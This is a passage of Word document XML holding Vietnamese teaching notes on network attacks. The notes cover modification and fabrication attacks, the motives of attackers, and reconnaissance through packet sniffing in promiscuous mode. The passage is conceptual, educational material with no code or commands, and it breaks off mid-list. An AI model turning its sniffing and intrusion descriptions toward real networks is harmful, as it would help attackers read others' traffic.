          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DE52417" w14:textId="53F0ED75" w:rsidR="00E80687" w:rsidRDefault="00E80687" w:rsidP="00E80687">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Sửa đổi thông tin (modification):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB9EE20" w14:textId="77777777" w:rsidR="00E80687" w:rsidRDefault="00E80687" w:rsidP="00E80687">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CD2854F" w14:textId="51312E2F" w:rsidR="00E80687" w:rsidRPr="007F0962" w:rsidRDefault="00E80687" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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Không những truy cập trái phép thông tin mà còn sửa đổi thông tin gốc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22468CF3" w14:textId="51E23697" w:rsidR="00E80687" w:rsidRPr="007F0962" w:rsidRDefault="00E80687" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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Dạng tấn công vào tính toàn vẹn thông tin</w:t>
      </w:r>
      <w:r w:rsidR="007F0962" w:rsidRPr="007F0962">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308DFAFB" w14:textId="0C40CE41" w:rsidR="007F0962" w:rsidRDefault="007F0962" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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Truy cập trái phép vào hệ thống, sửa đổi thông tin, thay đổi nội dung thông điệp được truyền tải.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78141CFC" w14:textId="77777777" w:rsidR="007F0962" w:rsidRPr="007F0962" w:rsidRDefault="007F0962" w:rsidP="007F0962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10359514" w14:textId="355813AD" w:rsidR="007F0962" w:rsidRDefault="007F0962" w:rsidP="007F0962">
      <w:p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drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="549B12E9" wp14:editId="03B264C4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1371600</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="3073400" cy="1701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3400" cy="1701800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CF7534" w14:textId="77777777" w:rsidR="007F0962" w:rsidRPr="007F0962" w:rsidRDefault="007F0962" w:rsidP="007F0962">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="454DC1C4" w14:textId="77777777" w:rsidR="007F0962" w:rsidRPr="007F0962" w:rsidRDefault="007F0962" w:rsidP="007F0962">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="111696A2" w14:textId="77777777" w:rsidR="007F0962" w:rsidRPr="007F0962" w:rsidRDefault="007F0962" w:rsidP="007F0962">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="774EB27A" w14:textId="77777777" w:rsidR="007F0962" w:rsidRPr="007F0962" w:rsidRDefault="007F0962" w:rsidP="007F0962">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C176ACF" w14:textId="77777777" w:rsidR="007F0962" w:rsidRPr="007F0962" w:rsidRDefault="007F0962" w:rsidP="007F0962">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EF7B0B0" w14:textId="19696443" w:rsidR="007F0962" w:rsidRDefault="007F0962" w:rsidP="007F0962">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="347FE906"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2A1B6984"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78ABBABA"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450B7AB7" w14:textId="77777777" w:rsidR="007F0962" w:rsidRDefault="007F0962" w:rsidP="007F0962">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Làm giả thông tin (fabrication)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E8C256" w14:textId="77777777" w:rsidR="007F0962" w:rsidRDefault="007F0962" w:rsidP="007F0962">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65E98A56" w14:textId="77777777" w:rsidR="007F0962" w:rsidRPr="007F0962" w:rsidRDefault="007F0962" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>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Người không được uỷ quyền đưa những thông tin gải mạo vào hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356DB4E0" w14:textId="77777777" w:rsidR="007F0962" w:rsidRPr="007F0962" w:rsidRDefault="007F0962" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>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Dạng tấn công vào tính xác thực thông tin (authencity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B51F0B" w14:textId="77777777" w:rsidR="007F0962" w:rsidRDefault="007F0962" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numP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t>Đưa những thông điệp giả mạo vào hệ thống, thêm những bản ghi mới vào file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BC4DE6" w14:textId="77777777" w:rsidR="007F0962" w:rsidRDefault="007F0962" w:rsidP="007F0962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B3828BE" w14:textId="19D0CA1C" w:rsidR="00E80687" w:rsidRPr="007F0962" w:rsidRDefault="007F0962" w:rsidP="007F0962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F0962">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79E65F9F" wp14:editId="15EF5398">
            <wp:extent cx="2705100" cy="1511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11300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="007F0962">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br w:type="textWrapping" w:clear="all"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFCC216" w14:textId="48183ACF"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ụm từ “Tấn công mạng” có 2 nghĩa hiểu:</w:t>
      </w:r>
      <w:r w:rsidR="00E80687" w:rsidRPr="00E80687">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAEB94F" w14:textId="4F735A4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0C07D429" w14:textId="4BA193EE" w:rsidR="00372720" w:rsidRPr="00C73388" w:rsidRDefault="00372720" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Hiểu theo cách tích cực </w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(positive way): Tấn công mạng (penetration testing) là phương pháp Hacker mũ trắng xâm nhập vào một hệ thống mạng, thiết bị, website để tìm ra những lỗ hổng, các nguy cơ tấn công nhằm bảo vệ cá nhân hoặc tổ chức.</w:t>
      </w:r>
      <w:r w:rsidR="00E80687" w:rsidRPr="00E80687">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2362CECF" w14:textId="1F9F88CF"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20A4B198" w14:textId="77777777" w:rsidR="00372720" w:rsidRPr="00C73388" w:rsidRDefault="00372720" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Hiểu theo cách tiêu cực (negative way): Tấn công mạng (network attack) là hình thức, kỹ thuật Hacker mũ đen tấn công vào một hệ thống để thay đổi đối tượng hoặc tống tiền.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693DD840" w14:textId="77777777" w:rsidR="00372720" w:rsidRDefault="00372720" w:rsidP="00372720">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="049E0CC2"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w:t>
      </w:r>
      <w:r w:rsidRPr="00A504D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ột cuộc tấn công không gian mạng có thể nhằm vào cá nhân, doanh nghiệp, quốc gia, xâm nhập vào trong hệ thống, cơ sở hạ tầng mạng, thiết bị, con người dưới nhiều các khác nhau và mục tiêu khác nhau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5C2B78"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p>
    <w:p w14:paraId="70FC6EE3" w14:textId="77777777" w:rsidR="00372720" w:rsidRPr="00C73388" w:rsidRDefault="00372720" w:rsidP="00372720">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noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3324E5D0" wp14:editId="29912086">
            <wp:extent cx="5728335" cy="4007485"/>
            <wp:effectExtent l="0" t="0" r="12065" b="5715"/>
            <wp:docPr id="3" name="Picture 3" descr="Screen%20Shot%202019-04-11%20at%203.2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11%20at%203.22.0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4007485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4177ECC4" w14:textId="77777777" w:rsidR="00372720" w:rsidRDefault="00372720" w:rsidP="00372720">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30C2EB87" w14:textId="1D9AD2B6" w:rsidR="00372720"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1.2. Đối tượng bị tấn công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D26918"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63168965" w14:textId="77777777" w:rsidR="00372720" w:rsidRPr="00C73388"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72A1D310"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452AF1D1" w14:textId="22B35ED2" w:rsidR="00372720" w:rsidRPr="00C73388"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1.3. Mục đích tấn công mạng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8BB313"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ích cực: Tìm ra những lỗ hổng bảo mật, những nguy cơ tấn công mạng cho cá nhân và tổ chức từ đó chỉ ra các giải pháp phòng chống, ngăn chặn sự đe dọa từ tin tặc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596192B4"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0F45E314" w14:textId="77777777" w:rsidR="00372720" w:rsidRDefault="00372720" w:rsidP="00372720">
      <w:pPr>
        <w:ind w:firstLine="72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iêu cực: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07252806"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Phá hoại: trong cùng một hệ thống mạng LAN (mạng nội bộ), tin tặc có thể xâm nhập vào hệ thống của công ty. Hacker đó sẽ đóng vai như một người dùng thật trong hệ thống, sau đó tiến hành xâm nhập vào tệp chứa tài liệu bí mật của công ty về tài chính. Tin tặc có thể rút sạch số tiền đó, hoặc thay đối các con số, ẩn file…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377D12AC"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Lừa đảo tống tiền: Vụ mã độc WannaCry tấn công hàng loạt các doanh nghiệp Việt Nam và đòi tiền chuộc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54421591"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Mua vui: Một học sinh lớp 9 tấn công vào các website sân bay Việt Nam với mục đích mua vui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064247A7" w14:textId="77777777" w:rsidR="00372720" w:rsidRPr="002F0A7D" w:rsidRDefault="00372720" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F0A7D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Đe dọa nạn nhân, Kẻ tấn công có thể đột nhập vào máy tính của bạn thông qua phần mềm gián điệp để nghe lén tin nhắn, hoặc xóa file dữ liệu nào đó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C37B54" w14:textId="77777777" w:rsidR="00372720" w:rsidRPr="00C73388" w:rsidRDefault="00372720" w:rsidP="00372720">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="615F1F0E" w14:textId="5A78A855" w:rsidR="00372720" w:rsidRPr="00C73388" w:rsidRDefault="007F0962"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2. Các phương pháp tấn công mạng điển hình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19373840" w14:textId="61DEB27F"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2.1. Tấn công do thám (Reconnaissance attack)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7675B2C2" w14:textId="3772A860"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2.1.1. Khái niệm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C57AF92" w14:textId="77777777" w:rsidR="00372720" w:rsidRDefault="00372720" w:rsidP="00372720">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ấn công do thám. Là hình thức tấn công nhằm thu thập các thông tin về hệ thống mục tiêu, từ đó phát hiện ra các điểm yếu. Tấn công do thám thường để làm bàn đạp cho cuộc tấn công truy cập hoặc tấn công từ chối dịch vụ về sau.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF72783" w14:textId="77777777" w:rsidR="00372720" w:rsidRDefault="00372720" w:rsidP="00372720">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45B1E0EB" w14:textId="1966B960" w:rsidR="00372720" w:rsidRPr="00C73388" w:rsidRDefault="00372720" w:rsidP="007F0962">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A504D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Tin tặc sẽ dùng công cụ bắt gói tin tự động, rà quét các lỗ hổng trong hệ thống, quét cổng, và kiểm tra các dịch vụ đang chạy với mục đích là thu thập thông tin về hệ thống. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Cũng như </w:t>
      </w:r>
      <w:r w:rsidRPr="00A504D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>trước khi muốn đột nhập vào nhà, kẻ trộm phải thăm dò đường vào lối ra, quan sát các vị trí của ngôi nhà, cửa số, và các điểm sơ hở của gia chủ sau đó mới thực hiện hành vi đột nhập.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540E813E"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p>
    <w:p w14:paraId="4B811A9D" w14:textId="44B2367A"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4.2.1.2. Các kỹ năng do thám thông dụng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E6D2E0" w14:textId="790C6833" w:rsidR="00372720" w:rsidRDefault="007F0962" w:rsidP="007F0962">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="207"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F0962">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Kỹ thuật n</w:t>
      </w:r>
      <w:r w:rsidR="00372720" w:rsidRPr="007F0962">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ghe lén</w:t>
      </w:r>
      <w:r w:rsidRPr="007F0962">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> (sniffer):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD8555E" w14:textId="77777777" w:rsidR="000E08FA" w:rsidRPr="007F0962" w:rsidRDefault="000E08FA" w:rsidP="007F0962">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="207"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7229648D" w14:textId="2934777A" w:rsidR="007F0962" w:rsidRDefault="000E08FA" w:rsidP="007F0962">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="207"/>
        <w:jc w:val="both"/>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Là một công cụ cho phép cấu hình card mạng ở chế độ hỗn độn (promiscuous mode), là chế độ có thể chặn bắt các gói tin bất kỳ chạy trên mạng LAN. Với công cụ này, kẻ tấn công có thể bắt các gói tin đang được gửi qua lại trên mạng LAN và phân tích. Nếu gói tin không được mã hóa thì kẻ tấn công sẽ dễ dàng đọc được nội dung.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724FCD03" w14:textId="77777777" w:rsidR="000E08FA" w:rsidRDefault="000E08FA" w:rsidP="007F0962">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="207"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C065C18" w14:textId="069B2A5B" w:rsidR="007F0962" w:rsidRDefault="007F0962" w:rsidP="007F0962">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="207"/>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Để nghe lén được cần phải:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8B8C88" w14:textId="2F15E57C" w:rsidR="007F0962" w:rsidRDefault="007F0962" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>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ó kết nối vật lý đến đường truyền</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76118702" w14:textId="0284FBE2" w:rsidR="007F0962" w:rsidRDefault="007F0962" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>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Có quyền nhận thông tin trong môi trường Hub, cùng khu việc mạng WLAN, </w:t>
      </w:r>
      <w:r w:rsidR="00B75764">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
